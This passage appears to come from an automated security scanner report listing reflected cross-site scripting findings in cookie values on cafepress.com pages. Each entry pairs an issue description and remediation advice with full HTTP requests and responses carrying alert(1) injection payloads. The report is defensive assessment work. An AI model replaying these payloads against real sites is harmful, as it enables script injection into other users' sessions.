2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAc2b67"-alert(1)-"894c7ad5c8f "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.43. http://www.cafepress.com/+journals [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+journals
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2e9e</script><script>alert(1)</script>cefee2eaa5b was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+journals HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=b2e9e</script><script>alert(1)</script>cefee2eaa5b ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 59387 Date: Sun, 26 Dec 2010 13:49:08 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:08 GMT; path=/ Set-Cookie: cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:08 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59387 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'b2e9e</script><script>alert(1)</script>cefee2eaa5b ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.44. http://www.cafepress.com/+keepsake_boxes [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+keepsake_boxes
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18c76"-alert(1)-"2689714fbb2 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+keepsake_boxes HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA18c76"-alert(1)-"2689714fbb2 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 59056 Date: Sun, 26 Dec 2010 13:49:12 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:12 GMT; path=/ Set-Cookie: cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:12 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59056 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA18c76"-alert(1)-"2689714fbb2 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.45. http://www.cafepress.com/+keepsake_boxes [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+keepsake_boxes
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f272a</script><script>alert(1)</script>d1528753cbe was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+keepsake_boxes HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=f272a</script><script>alert(1)</script>d1528753cbe ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 59083 Date: Sun, 26 Dec 2010 13:49:10 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:10 GMT; path=/ Set-Cookie: cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:10 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59083 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'f272a</script><script>alert(1)</script>d1528753cbe ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.46. http://www.cafepress.com/+license_plate_frames [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+license_plate_frames
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fe28"-alert(1)-"4e9cbe178c4 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+license_plate_frames HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA7fe28"-alert(1)-"4e9cbe178c4 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 59959 Date: Sun, 26 Dec 2010 13:48:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:49 GMT; path=/ Set-Cookie: cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:49 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59959 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA7fe28"-alert(1)-"4e9cbe178c4 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.47. http://www.cafepress.com/+license_plate_frames [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+license_plate_frames
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2df2e</script><script>alert(1)</script>12b946216a2 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+license_plate_frames HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=2df2e</script><script>alert(1)</script>12b946216a2 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 59978 Date: Sun, 26 Dec 2010 13:48:47 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/ Set-Cookie: cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59978 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '2df2e</script><script>alert(1)</script>12b946216a2 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.48. http://www.cafepress.com/+magnets [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+magnets
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48b1e"-alert(1)-"48ef400b324 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+magnets HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; 